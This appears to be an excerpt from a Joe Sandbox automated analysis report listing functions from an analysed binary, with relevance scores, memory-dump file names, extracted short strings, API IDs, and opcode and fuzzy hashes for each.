                                                                              • Opcode ID: 8348fdf11ca2443546b9cd32bcd3b5052cdeea2300d23312f03bccbd3e12035b
                                                                              • Instruction ID: 02c2dde833218ec7022eb2f70ce492c249cfaf66a4b16181c6b50aba0a78d62a
                                                                              • Opcode Fuzzy Hash: 8348fdf11ca2443546b9cd32bcd3b5052cdeea2300d23312f03bccbd3e12035b
                                                                              • Instruction Fuzzy Hash: D4B206F360C2049FE3046F29EC85A7ABBE9EF94720F16493DEAC4C3744EA3559058697
                                                                              Function 00AC4040 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+($f
                                                                              • API String ID: 0-2038831151
                                                                              • Opcode ID: 7e454c422a1fe5460fb2b3eb7f5df30e35f98fb4342b8501244589d33270b6e2
                                                                              • Instruction ID: 99de6d7f8bc0f25b369e05642a56c35359e9abbd5542525404fcc91fbdcd30fe
                                                                              • Opcode Fuzzy Hash: 7e454c422a1fe5460fb2b3eb7f5df30e35f98fb4342b8501244589d33270b6e2
                                                                              • Instruction Fuzzy Hash: 1B129B716083419FC714CF28C8A0F2ABBF2BB89314F198A2DF4D59B291D735E945CB96
                                                                              Function 00ABF620 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: dg$hi
                                                                              • API String ID: 0-2859417413
                                                                              • Opcode ID: 9ea837ab31a0cc20b6debd071fa3cb882bb6ae4587564c3eb09ff377118df0ab
                                                                              • Instruction ID: a231bfcfe6626723e05fdf76f6f682318f394432ca578798051118d0548bb395
                                                                              • Opcode Fuzzy Hash: 9ea837ab31a0cc20b6debd071fa3cb882bb6ae4587564c3eb09ff377118df0ab
                                                                              • Instruction Fuzzy Hash: E1F19471618341EFE704CF64D891B6ABBF6EB89344F189D2DF0868B2A2C735D845CB12
                                                                              Function 00A835B0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Inf$NaN
                                                                              • API String ID: 0-3500518849
                                                                              • Opcode ID: a96352e4fa258c05b91129135dd48cdfb5b711b8ad19d79e4506251617c4f63a
                                                                              • Instruction ID: 035c3b5eecd6856fb89326065b0c7ca4b1b5e5d2b9ddb2885b4bfb528115d14e
                                                                              • Opcode Fuzzy Hash: a96352e4fa258c05b91129135dd48cdfb5b711b8ad19d79e4506251617c4f63a
                                                                              • Instruction Fuzzy Hash: C7D1D672A083119BCB08DF29C88061EFBE5EBC8B50F15893DF99997390E675DD058B82
                                                                              Function 00A9FFDF Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BaBc$Ye[g
                                                                              • API String ID: 0-286865133
                                                                              • Opcode ID: 5c495a3398408b88a4d899f13cb63bb0a19c9df299c5bec98e97b25b5b8b88fb
                                                                              • Instruction ID: 0584e985dfa1609002c117b4f63a6133b81a54848347b1b1202dc3b881917718
                                                                              • Opcode Fuzzy Hash: 5c495a3398408b88a4d899f13cb63bb0a19c9df299c5bec98e97b25b5b8b88fb
                                                                              • Instruction Fuzzy Hash: 375189B16083818BD731DF18C881BABB7E0FF97360F19492DE49A8B691E3749944CB57
                                                                              Function 00C5BDCE Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;$wg
                                                                              • API String ID: 0-2323797322
                                                                              • Opcode ID: 1181b87e101e84e33dbb0f4509666f230e80abb7417a955e95bfe4270ab44fe7
                                                                              • Instruction ID: dbe660cc68888cc8046424abebe31c78700c48a7a341240addf6c6e1fd386e4c
                                                                              • Opcode Fuzzy Hash: 1181b87e101e84e33dbb0f4509666f230e80abb7417a955e95bfe4270ab44fe7
                                                                              • Instruction Fuzzy Hash: A41204F360C6049FD3046F2DEC8567AFBE9EFD4720F16492EE6C487350EA3558418A56
                                                                              Function 00A85160 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %1.17g
                                                                              • API String ID: 0-1551345525
                                                                              • Opcode ID: c15d4aebe056cedfa328704b1a229789e3290a630df9baf01febe66908791450
                                                                              • Instruction ID: 06505d7787c404500f073ca89a8f2ad20194811dc16090b79a19900ecf84454f
                                                                              • Opcode Fuzzy Hash: c15d4aebe056cedfa328704b1a229789e3290a630df9baf01febe66908791450
                                                                              • Instruction Fuzzy Hash: 7122BFB6E08B428BE715AF38D940326BBA2AFA1314F1DC96DDC994B341E771DC49C742
                                                                              Function 00AB12D0 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "
                                                                              • API String ID: 0-123907689
                                                                              • Opcode ID: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                              • Instruction ID: a352eb43eeebf1d4b7aafd0fee418c9b3e2cd05a9624db4f0244fd287cea9cff
                                                                              • Opcode Fuzzy Hash: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                              • Instruction Fuzzy Hash: AEF10871A083415FC724CF24C4A06ABBBEAAFC5354F58C96DE89A8B383D634DD45C792
                                                                              Function 00AAAE57 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: 6c62b46fa64565a35d153d6518b3b9e27f00d6bc43e39c9fcde1ad0f045a5818
                                                                              • Instruction ID: a8cae4ae026cb0339563bcf0b8087b166c3ca59352ae5ad7cbe95eb9dcf5d24e
                                                                              • Opcode Fuzzy Hash: 6c62b46fa64565a35d153d6518b3b9e27f00d6bc43e39c9fcde1ad0f045a5818
                                                                              • Instruction Fuzzy Hash: F9E1DC71518306DBC714EF28C49056EB3F2FF9A781F54891CE4C6872A1E331E959CBA2
                                                                              Function 00A96EBF Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: 5f6eb54b63cfb12d93f21fb623076c6f19f3f7c8c88d37579fd8bccfe7a961e6
                                                                              • Instruction ID: 4d72f253ebe55585c1f24fa83924ede525e66a2e65fa6afe7a258a477d4d526c
                                                                              • Opcode Fuzzy Hash: 5f6eb54b63cfb12d93f21fb623076c6f19f3f7c8c88d37579fd8bccfe7a961e6
                                                                              • Instruction Fuzzy Hash: 3EF18DB5A00B01CFCB24DF24D981A26B3F6FF48314B158A2DE49787AA1EB34F815CB51
                                                                              Function 00AA7E60 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: 4f1bb1de5700747ddf132b937094556c2a52e81096cfc3e9d69edc574bd1c648
                                                                              • Instruction ID: f511251f0cad7b9f9d6dd53100707a088f1c5ae4d54f3a44ddddf02f426856f3
                                                                              • Opcode Fuzzy Hash: 4f1bb1de5700747ddf132b937094556c2a52e81096cfc3e9d69edc574bd1c648
                                                                              • Instruction Fuzzy Hash: 3BC19E71908200ABD711EB14CD82A2FB7F5EF96754F08891CF8C59B291E739ED15CBA2
                                                                              Function 00AA8D62 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %*+(
                                                                              • API String ID: 0-3233224373
                                                                              • Opcode ID: b7a037cc21b4f89b60e7250bdbdee9abe4042c4bea9602e5073cf7a7f978c264
                                                                              • Instruction ID: 4b8377a4a4eb2153d39ba7aa61a48ba74ff0c32d3923e0f64ff2ec67dfad5a89
                                                                              • Opcode Fuzzy Hash: b7a037cc21b4f89b60e7250bdbdee9abe4042c4bea9602e5073cf7a7f978c264
                                                                              • Instruction Fuzzy Hash: 70D1CD70619302DFD704DFA8DC90B2AB7E6FF8A304F59886EE88687291D734E951CB51
                                                                              Function 00AC7FC0 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: P
                                                                              • API String ID: 0-3110715001
                                                                              • Opcode ID: a85ffea7b153fbe731cf85d391b581100bce74389cd7213e4447ca86ec539fdb
                                                                              • Instruction ID: b8bfef908bcc260d4f5cfcc89f974939cf1c7433e7c3371ba6dab19a39538b49
                                                                              • Opcode Fuzzy Hash: a85ffea7b153fbe731cf85d391b581100bce74389cd7213e4447ca86ec539fdb
                                                                              • Instruction Fuzzy Hash: 31D1D4729082658FC725CE189890B5EB7E1FB85718F168A3CE8B5AB380DB75DC46C7C1
                                                                              Function 00AACCD0 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230811558.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_a80000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: %*+(
                                                                              • API String ID: 2994545307-3233224373
                                                                              • Opcode ID: bc27126c810948894e5bea5723c60ef94d02f255bfc00b6f5c26ce43913b711e
                                                                              • Instruction ID: 5dcedefb80cc9d19d32693c706a643fcea6115fa92c2d22720a730140046b9aa
                                                                              • Opcode Fuzzy Hash: bc27126c810948894e5bea5723c60ef94d02f255bfc00b6f5c26ce43913b711e
                                                                              • Instruction Fuzzy Hash: 97B1D070A093019FE714DF64D880B2BBBE2EF96360F14492CE5C68B291E335D955CB92
                                                                              Function 00A8A850 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.2230215406.0000000000A80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000C6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230266283.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230678914.0000000000D8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2230794173.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
